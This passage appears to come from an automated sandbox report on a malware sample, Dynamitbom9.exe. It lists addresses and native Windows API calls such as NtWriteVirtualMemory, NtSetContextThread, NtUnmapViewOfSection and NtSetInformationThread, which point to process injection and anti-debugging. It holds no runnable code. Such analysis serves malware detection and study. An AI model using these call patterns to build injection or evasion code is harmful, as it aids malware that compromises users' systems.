    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F7CC3 NtResumeThread,3_2_001F7CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F3AE2 NtAllocateVirtualMemory,3_2_001F3AE2
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F7F37 NtResumeThread,3_2_001F7F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F076D NtSetInformationThread,TerminateProcess,3_2_001F076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F2D9E NtWriteVirtualMemory,3_2_001F2D9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F2FD1 NtWriteVirtualMemory,3_2_001F2FD1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F2BC5 NtWriteVirtualMemory,3_2_001F2BC5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F7DFF NtResumeThread,3_2_001F7DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F81E5 NtResumeThread,3_2_001F81E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 3_2_001F7FE1 NtResumeThread,3_2_001F7FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5EC0 NtReadVirtualMemory,NtReadVirtualMemory,4_2_1ECA5EC0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5E80 NtReadFile,NtReadFile,4_2_1ECA5E80
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5E40 NtQueueApcThread,NtQueueApcThread,4_2_1ECA5E40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5C10 NtQueryInformationProcess,NtQueryInformationProcess,4_2_1ECA5C10
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5DC0 NtQuerySystemInformation,NtQuerySystemInformation,4_2_1ECA5DC0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA57F0 NtMapViewOfSection,NtMapViewOfSection,4_2_1ECA57F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA55A0 NtFreeVirtualMemory,4_2_1ECA55A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA52B0 NtCreateSection,NtCreateSection,4_2_1ECA52B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5390 NtDelayExecution,NtDelayExecution,4_2_1ECA5390
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5190 NtCreateFile,NtCreateFile,4_2_1ECA5190
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA4EA0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,4_2_1ECA4EA0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA4E30 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,4_2_1ECA4E30
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA6460 NtSuspendThread,NtSuspendThread,4_2_1ECA6460
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA6580 NtUnmapViewOfSection,NtUnmapViewOfSection,4_2_1ECA6580
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA6070 NtResumeThread,NtResumeThread,4_2_1ECA6070
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA6130 NtSetContextThread,NtSetContextThread,4_2_1ECA6130
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5E10 NtQueryValueKey,4_2_1ECA5E10
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5E20 NtQueryVirtualMemory,4_2_1ECA5E20
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5C40 NtQueryInformationToken,4_2_1ECA5C40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5D50 NtQuerySection,4_2_1ECA5D50
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5AE0 NtProtectVirtualMemory,4_2_1ECA5AE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5BE0 NtQueryInformationFile,4_2_1ECA5BE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5860 NtOpenDirectoryObject,4_2_1ECA5860
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA59D0 NtOpenThread,4_2_1ECA59D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5950 NtOpenProcess,4_2_1ECA5950
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5960 NtOpenProcessToken,4_2_1ECA5960
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA54E0 NtEnumerateValueKey,4_2_1ECA54E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA54B0 NtEnumerateKey,4_2_1ECA54B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA55E0 NtGetContextThread,4_2_1ECA55E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5270 NtCreateProcessEx,4_2_1ECA5270
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5210 NtCreateMutant,4_2_1ECA5210
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA5090 NtClose,4_2_1ECA5090
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA51D0 NtCreateKey,4_2_1ECA51D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA6660 NtWriteVirtualMemory,4_2_1ECA6660
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA6630 NtWriteFile,4_2_1ECA6630
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA65E0 NtWaitForSingleObject,4_2_1ECA65E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA6200 NtSetInformationFile,4_2_1ECA6200
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_1ECA63D0 NtSetValueKey,4_2_1ECA63D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_001544D9 NtAllocateVirtualMemory,4_2_001544D9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157829 NtProtectVirtualMemory,4_2_00157829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157C0A NtSetInformationThread,4_2_00157C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_001580A5 NtSetInformationThread,4_2_001580A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_001581E5 NtSetInformationThread,4_2_001581E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_001582D5 NtSetInformationThread,4_2_001582D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_0015076D NtSetInformationThread,4_2_0015076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_0015083D NtSetInformationThread,4_2_0015083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00150ADD NtProtectVirtualMemory,4_2_00150ADD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00153AE2 NtAllocateVirtualMemory,4_2_00153AE2
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157C17 NtSetInformationThread,4_2_00157C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157CC3 NtSetInformationThread,4_2_00157CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157DFF NtSetInformationThread,4_2_00157DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157E9B NtSetInformationThread,4_2_00157E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157F37 NtSetInformationThread,4_2_00157F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 4_2_00157FE1 NtSetInformationThread,4_2_00157FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7C0A NtResumeThread,8_2_001F7C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7829 NtProtectVirtualMemory,8_2_001F7829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F44D9 NtAllocateVirtualMemory,8_2_001F44D9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F0722 EnumWindows,NtSetInformationThread,TerminateProcess,NtAllocateVirtualMemory,8_2_001F0722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F29F9 NtWriteVirtualMemory,8_2_001F29F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7C17 NtResumeThread,8_2_001F7C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F2A09 NtWriteVirtualMemory,8_2_001F2A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F083D NtSetInformationThread,TerminateProcess,8_2_001F083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F2E9E NtWriteVirtualMemory,8_2_001F2E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7E9B NtResumeThread,8_2_001F7E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F2CBD NtWriteVirtualMemory,8_2_001F2CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F80A5 NtResumeThread,8_2_001F80A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F2AD9 NtWriteVirtualMemory,8_2_001F2AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F82D5 NtResumeThread,8_2_001F82D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7CC3 NtResumeThread,8_2_001F7CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F3AE2 NtAllocateVirtualMemory,8_2_001F3AE2
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 8_2_001F7F37 NtResumeThread,